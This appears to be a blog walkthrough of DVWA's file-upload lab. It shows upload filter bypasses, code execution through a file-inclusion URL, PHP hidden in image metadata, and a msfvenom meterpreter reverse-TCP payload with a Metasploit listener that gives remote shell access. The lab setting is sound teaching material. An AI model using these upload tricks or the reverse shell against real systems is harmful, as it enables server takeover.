I am so excited, today we will be using Grumpy Cat to execute code, The cat is a legend.
Alright, lets start at the beginning. I already covered File Inclusion as a cause for vulnerabilities. Today I will cover File Upload. Lets start at the beginning.
As always, low security basically means no security whatsoever, so lets create a PHP file that we will use for our upload, I will call it
<?php echo "Hacked"; ?>
When the code in our script executes it will print “Hacked”. Lets try and upload this PHP file.
The interface quite nicely shows us that the file is located at
../../hackable/uploads/hack.php, so all we need to do is to find a way to execute the file.
In this case we can literally just paste the path into the address bar and request the file
http://localhost:32770/vulnerabilities/upload/../../hackable/uploads/hack.php. The code from the script ran on the server and the screen shows us “Hacked”.
Lets try and upload the same file again.
Sadly it will only accept
PNG images. So what happens if we just rename the file? Lets rename the file to
hack.php.png and try to upload it!
It uploads just fine! Now, lets run the code! The address will be almost the same as before:
http://localhost:32770/vulnerabilities/upload/../../hackable/uploads/hack.php.png, but the result is quite different!
It tried to display the image to us, that is not what we want! Luckily we can use the File Inclusion vulnerability we found earlier to run this code I think. Lets craft an URL that will work on even the high setting. This will be
http://localhost:32770/vulnerabilities/fi/?page=file:///app/hackable/uploads/hack.php.png. Run it and lets see the result:
That is more like it, the “picture” was included and the contents was execute as PHP code.
Now for the real challenge. None of the previous attacks work at this level; the system will only accept images. But did you know images can have plain text content as well? If you open any image, say of Grumpy Cat, in Gimp (or any other image editor) you can take a look at the image properties. It has a field called Comment and you can add any text you want there, including code.
In this case I chose to echo the
phpinfo() because when you include only the “Hacked” it will be very hard to find between the rest of the output of the image.
Lets upload this image and then execute it through our file inclusion technique.
Sure enough, we now have the output from
phpinfo() on our screen. This is due to the upload process not stripping out the metadata of the image and the PHP interperter trying real hard to find something that it can execute.
So, lets try and get shell access again based on this technique. We will use the metasploit framework that comes with Kali Linux.
First thing to do is to generate an PHP file that can connect back to our Kali machine from our DVWA instance. As part of metasploit a tool is available called
msfvenom. It is a payload generator and encoder. You can use it to add payloads to regular programs as well as just a plain old PHP file.
msfvenom --arch php --platform php --payload php/meterpreter/reverse_tcp LHOST=172.18.0.1 LPORT=8080 > exploit.php
The command will create a PHP file (
--platform) which will have a
payload and we pass it the
LHOST (local host) and
LPORT (local port) of the Kali instance. The output is written to
explot.php. Take a look at the code and see if you can figure out what it will do, I will wait.
The exploit will open a socket connection over which metasploit can send commands, just as the name advertised. First thing to do now is to let metasploit (type
msfconsole in a terminal) listen to port 8080 to receive this connection.
msf > use exploit/multi/handler msf exploit(handler) > set LHOST 172.18.0.1 LHOST => 172.18.0.1 msf exploit(handler) > set LPORT 8080 LPORT => 8080 msf exploit(handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(handler) > exploit [-] Handler failed to bind to 172.18.0.1:8080:- - [*] Started reverse TCP handler on 0.0.0.0:8080 [*] Starting the payload handler...
exploit/multi/handler exploit allows us to set a payload (
reverse_tcp) to be run as a meterpreter listener. When we upload the exploit code and run it, it will connect to this payload handler.
The browser tab will keep “loading” the page, but you now have full access to the machine! Thats how easy it is to actually take advantage of such a vulnerability.